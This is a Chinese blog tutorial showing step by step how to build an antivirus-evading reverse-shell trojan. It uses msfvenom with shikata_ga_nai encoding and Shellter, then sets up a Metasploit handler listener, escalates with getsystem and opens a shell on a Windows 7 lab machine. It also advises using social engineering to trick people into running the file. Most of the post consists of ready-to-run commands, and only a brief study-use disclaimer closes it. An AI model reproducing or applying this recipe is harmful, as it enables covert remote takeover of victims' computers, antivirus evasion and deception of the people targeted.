zoukankan      html  css  js  c++  java
  • msf反弹木马之免杀

    原理

    利用msf模块中的msfvenom模块,首先生成.exe木马文件,用靶机打开,攻击成功后,就渗透到了靶机系统中。

    准备

    win7靶机 ip :192.168.56.130
    kali攻击机 ip: 192.168.56.135

    ##实战开始
    1.打开kali机,在命令行输入:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.135 lport=1234 -e x86/shikata_ga_nai -i 5 -f exe >/home/kali/Desktop/1.exe
    

    LHOST是主机的ip,用来“提醒”木马成功后应该返回信息给自己的主机。
    lport是返回时连接的端口号,需要开启tcp功能,1234端口好像默认开启?
    > 后面的那一串表示木马生成的对应地址,为了方便操作我直接生成在桌面上。
    -e x86/shikata_ga_nai 为使用shikata_ga_nai的编码方式对攻击载荷进行重新编码
    -i 5为使用刚才设定的编码方式对目标进行5次编码

    2.命令行输入

    shellter
    

    第一个选项选择Aimage.png

    3.PE Target 后面填写/home/kali/Desktop/1.exe,即木马所在路径。
    然后等待一段时间······
    image.png
    注意,虽然看着不动,但是上面那个数字一直在跳,所以不是你卡住了~

    4.然后选择Yimage.png

    5.选择L,payload index 选择1image.png

    6.设置LHOST以及LPORTimage.png

    等个大概2秒钟,就结束了~
    免杀木马制作完成。
    命令行输入

    msfconsole
    

    进入metasploit。
    然后输入

    use exploit/multi/handler
    

    开启监听模式
    接下来就是设置参数了,可以使用option命令来查看需要设置的参数。主要设置三个:payload、LHOST、LPORT,需要跟木马一样,复制一下就行

    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.56.135
    set lport 1234
    

    这里大小写随意,都可以被识别。
    随后输入

    exploit
    

    执行监听命令,也就是攻击开始~

    kali端操作结束!

    然后利用社会工程学等方式诱骗其他人点击这玩意,就被攻击了。

    现在假装win7被骗了,无意中点了我的反弹木马:
    image.png

    然后输入

    shell
    

    就可以获取对方管理员权限。
    在输入shell之前,输入getsystem,获得system权限以后,再输入shell就可以获得最高权限啦~
    image.png
    使用echo %username%可以输出使用者的名字,这里是SJX-PC$,如果是管理员的话,只会显示管理员账号(我这里是“sjx”),而且,看前面的内容也可以知道是system权限:image.png


    本篇文章仅供学习使用,读者请勿随意对他人电脑进行操作。

  • 相关阅读:
    mac 使用brew 安装php-redis
    thinkphp6 使用redis 实现消息队列
    Redis 桌面管理器:Another Redis Desktop Manager
    linux 查看并关闭shell脚本执行
    MySQL教程之concat以及group_concat的用法
    PHP redis 使用
    thinkphp6 command(自定义指令)
    git 使用
    linux shell中 "2>&1"含义
    linux crontab 定时任务
  • 原文地址:https://www.cnblogs.com/shenjuxian/p/13702764.html
Copyright © 2011-2022 走看看